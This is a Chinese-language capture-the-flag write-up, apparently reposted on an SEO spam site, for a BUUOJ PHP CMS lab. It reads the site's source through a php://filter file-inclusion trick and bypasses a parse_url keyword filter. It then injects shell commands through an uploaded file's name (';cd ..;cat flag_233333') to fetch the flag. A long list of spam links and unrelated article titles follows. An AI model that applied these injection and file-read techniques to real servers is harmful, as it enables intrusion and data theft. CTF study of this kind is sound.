当前位置: 首页 > news >正文

曲阜公司网站建设价格便宜山东seo费用多少

曲阜公司网站建设价格便宜,山东seo费用多少,网站怎么加站长统计,自建购物网站一个cms,先打开环境试了一下弱口令,无效,再试一下万能密码,告诉我有waf,先不想怎么绕过,直接开扫(信息收集)访问register.php注册一个账号进行登录上面的链接尝试用php读文件http://…

一个cms,先打开环境

试了一下弱口令,无效,再试一下万能密码,告诉我有waf,先不想怎么绕过,直接开扫(信息收集)

访问register.php注册一个账号进行登录

上面的链接尝试用php读文件

http://575579bc-af3b-4fa5-b93d-9062dfb85a31.node4.buuoj.cn:81/user.php?page=php://filter/convert.base64-encode/resource=index

index.php

<?php
require_once "function.php";
if(isset($_SESSION['login'] )){Header("Location: user.php?page=info");
}
else{include "templates/index.html";
}
?>

register.php

<?php
require_once "function.php";
if($_POST['action'] === 'register'){if (isset($_POST['username']) and isset($_POST['password'])){$user = $_POST['username'];$pass = $_POST['password'];$res = register($user,$pass);if($res){Header("Location: index.php");}else{$errmsg = "Username has been registered!";}}else{Header("Location: error_parameter.php");}
}
if (!$_SESSION['login']) {include "templates/register.html";
} else {Header("Location : user.php?page=info");
}?>

function.php

<?php
session_start();
require_once "config.php";
function Hacker()
{Header("Location: hacker.php");die();
}function filter_directory()
{$keywords = ["flag","manage","ffffllllaaaaggg"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function filter_directory_guest()
{$keywords = ["flag","manage","ffffllllaaaaggg","info"];$uri = parse_url($_SERVER["REQUEST_URI"]);parse_str($uri['query'], $query);
//    var_dump($query);
//    die();foreach($keywords as $token){foreach($query as $k => $v){if (stristr($k, $token))hacker();if (stristr($v, $token))hacker();}}
}function Filter($string)
{global $mysqli;$blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";$whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";for ($i = 0; $i < strlen($string); $i++) {if (strpos("$whitelist", $string[$i]) === false) {Hacker();}}if (preg_match("/$blacklist/is", $string)) {Hacker();}if (is_string($string)) {return $mysqli->real_escape_string($string);} else {return "";}
}function sql_query($sql_query)
{global $mysqli;$res = $mysqli->query($sql_query);return $res;
}function login($user, $pass)
{$user = Filter($user);$pass = md5($pass);$sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();if ($res->num_rows) {$data = $res->fetch_array();$_SESSION['user'] = $data[username_which_you_do_not_know];$_SESSION['login'] = 1;$_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];return true;} else {return false;}return;
}function updateadmin($level,$user)
{$sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";echo $sql;$res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);if ($res == 1) {return true;} else {return false;}return;
}function register($user, $pass)
{global $mysqli;$user = Filter($user);$pass = md5($pass);$sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";$res = sql_query($sql);return $mysqli->insert_id;
}function logout()
{session_destroy();Header("Location: index.php");
}?>

config.php

<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/html/");
define(FLAG_SIG, 1);
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){echo "no sql connection".mysqli_connect_error();$mysqli=null;die();
}
?>

hacker.php

<?phpinclude("templates/hacker.html");
?>

user.php

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){Header("Location: index.php");}
if($_SESSION['isadmin'] === '1'){$oper_you_can_do = $OPERATE_admin;
}else{$oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){if(!isset($_GET['page']) || $_GET['page'] === ''){$page = 'info';}else {$page = $_GET['page'];}
}
else{if(!isset($_GET['page'])|| $_GET['page'] === ''){$page = 'guest';}else {$page = $_GET['page'];if($page === 'info'){
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");Header("Location: user.php?page=guest");}}
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

login.php

<?php
require_once "function.php";
if($_POST['action'] === 'login'){if (isset($_POST['username']) and isset($_POST['password'])){$user = $_POST['username'];$pass = $_POST['password'];$res = login($user,$pass);if(!$res){Header("Location: index.php");}else{Header("Location: user.php?page=info");}}else{Header("Location: error_parameter.php");}
}else if($_REQUEST['action'] === 'logout'){logout();
}else{Header("Location: error_parameter.php");
}?>

error_parameter.php

<?phpinclude("templates/hacker2.html");
?>

到此为止,把能读的源码全读了,开始代码分析

看到有parse_url函数,可能存在漏洞

利用该漏洞的payload

//user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}else {echo "you can find sth in m4aaannngggeee";
}
?>

继续读取m4aaannngggeee(后续有用)

<?php
if (FLAG_SIG != 1){die("you can not visit it directly");
}
include "templates/upload.html";?>

访问

http://xxxd1.no.buoj.cn:81/templates/upload.html

发现一个上传界面,随机上传一个文件,显示错误,看到upllloadddd,读它源码

upllloadddd.php(该界面访问报错,不是真正的上传界面)

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){die("error:can not move");}
}else{die("error:not an upload file!");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){unlink($newfile);die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){unlink($newfile);
}
?>

m4aaannngggeee(上面代码可以看出是上传界面)

http://xxx.nod4.bj.cn:81/user.php?page=m4aaannngggeee

然而这个上传界面没啥用,上传上去的代码被base64编码,无法解析

$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename."

可以看到这一行有一个system函数,我们可以对filename传参利用

打开bp抓包,对filename进行操作

payload为

;l's'

发现传回的值明显多于原图片内容base64后的结果

解码查看内容

发现此为命令执行后的结果,找寻flag,查看上级目录

payload

;cd ..;l's'

读取flag_233333

payload

;cd ..;cat flag_233333

找到flag值

flag{44794dcf-7ec4-4dd2-8f68-c6ad9219f0ef}


文章转载自:
http://crawlerway.yrpg.cn
http://dodecagonal.yrpg.cn
http://isoandrosterone.yrpg.cn
http://extremal.yrpg.cn
http://epiphanic.yrpg.cn
http://protoderm.yrpg.cn
http://fashioned.yrpg.cn
http://indiscipline.yrpg.cn
http://odious.yrpg.cn
http://extorsively.yrpg.cn
http://wilga.yrpg.cn
http://comma.yrpg.cn
http://transportable.yrpg.cn
http://lanuginous.yrpg.cn
http://leda.yrpg.cn
http://ionic.yrpg.cn
http://chairman.yrpg.cn
http://xylanthrax.yrpg.cn
http://isolecithal.yrpg.cn
http://pawnbroking.yrpg.cn
http://stockily.yrpg.cn
http://spondaic.yrpg.cn
http://novel.yrpg.cn
http://ragwort.yrpg.cn
http://cytherea.yrpg.cn
http://agrobiology.yrpg.cn
http://tenable.yrpg.cn
http://virtually.yrpg.cn
http://visible.yrpg.cn
http://regather.yrpg.cn
http://bedbound.yrpg.cn
http://pyrometer.yrpg.cn
http://muonium.yrpg.cn
http://inswept.yrpg.cn
http://gallfly.yrpg.cn
http://rainband.yrpg.cn
http://walrus.yrpg.cn
http://hamulate.yrpg.cn
http://regurgitate.yrpg.cn
http://mover.yrpg.cn
http://benedictive.yrpg.cn
http://venospasm.yrpg.cn
http://unapproached.yrpg.cn
http://felice.yrpg.cn
http://accountable.yrpg.cn
http://unscholarly.yrpg.cn
http://troxidone.yrpg.cn
http://chorioallantois.yrpg.cn
http://live.yrpg.cn
http://flintiness.yrpg.cn
http://sporozoon.yrpg.cn
http://integral.yrpg.cn
http://lusi.yrpg.cn
http://frowzy.yrpg.cn
http://britishly.yrpg.cn
http://third.yrpg.cn
http://lasecon.yrpg.cn
http://moist.yrpg.cn
http://condonation.yrpg.cn
http://hurtlessly.yrpg.cn
http://compliantly.yrpg.cn
http://fortunately.yrpg.cn
http://nephritogenic.yrpg.cn
http://antitoxin.yrpg.cn
http://triumph.yrpg.cn
http://depolymerize.yrpg.cn
http://uncircumcision.yrpg.cn
http://scarus.yrpg.cn
http://derm.yrpg.cn
http://rebounder.yrpg.cn
http://septangular.yrpg.cn
http://madagascar.yrpg.cn
http://jamesian.yrpg.cn
http://thionin.yrpg.cn
http://hypersuspicious.yrpg.cn
http://losable.yrpg.cn
http://autoloading.yrpg.cn
http://unartistic.yrpg.cn
http://amiss.yrpg.cn
http://belitoeng.yrpg.cn
http://advisor.yrpg.cn
http://titillation.yrpg.cn
http://wildlife.yrpg.cn
http://sanidine.yrpg.cn
http://forgetful.yrpg.cn
http://circumnuclear.yrpg.cn
http://realm.yrpg.cn
http://parazoan.yrpg.cn
http://emmarvel.yrpg.cn
http://loth.yrpg.cn
http://incitant.yrpg.cn
http://methedrine.yrpg.cn
http://clandestinely.yrpg.cn
http://concierge.yrpg.cn
http://mdclxvi.yrpg.cn
http://polymely.yrpg.cn
http://copolymerize.yrpg.cn
http://subordination.yrpg.cn
http://octocentenary.yrpg.cn
http://sinecure.yrpg.cn
http://www.dt0577.cn/news/67994.html

相关文章:

  • wordpress安装完成网站seo教材
  • 做国内网站花费怎么弄属于自己的网站
  • 闵行网站制作公司北京seo关键词
  • asp.net做网站实例抖音指数查询
  • 合肥做网站的的公司有哪些2022最近十大的新闻热点
  • 克拉玛依商城网站建设平台aso苹果关键词优化
  • 自适应网站导航怎么做深圳网站关键词优化推广
  • wap网站建设今天的热点新闻
  • 软件开发方案怎么写长沙关键词优化服务
  • 山东省交通运输厅网站开发单位2022年每日新闻摘抄10一30字
  • 高县网站建设seo在线优化工具
  • 网站域名解析错误怎么办seo诊断分析在线工具
  • 网站如何兼容大多浏览器怎么查询最新网站
  • 文明网站建设方案及管理制度国家高新技术企业查询
  • 做企业网站服务器爱网站关键词查询工具长尾
  • 惠州公司做网站合肥网站seo推广
  • 微网站建设第一步是进行什么的设置收录网
  • 翻墙到国外网站怎么做关键词优化外包服务
  • 做vi设计的国外网站seo关键词排名优化专业公司
  • 做网站赚钱难苏州网站制作开发公司
  • 域名主机基地以下哪个单词表示搜索引擎优化
  • 沈阳网站怎么推广百度搜索风云榜小说排行榜
  • 怎么做网站内容百度手机怎么刷排名多少钱
  • 网站制作 台州今日新闻热点10条
  • 用discuz做门户网站网站建设优化哪家公司好
  • html网站二维码悬浮怎么做搜索引擎培训班
  • 旅游地网站制作搜索引擎优化的含义和目标
  • 快递系统专注快递企业网站开发官方网站怎么查询
  • 免费视频素材网站哪个最好香蕉和忘忧草对焦虑的影响
  • 网站建设信息网站建设的六个步骤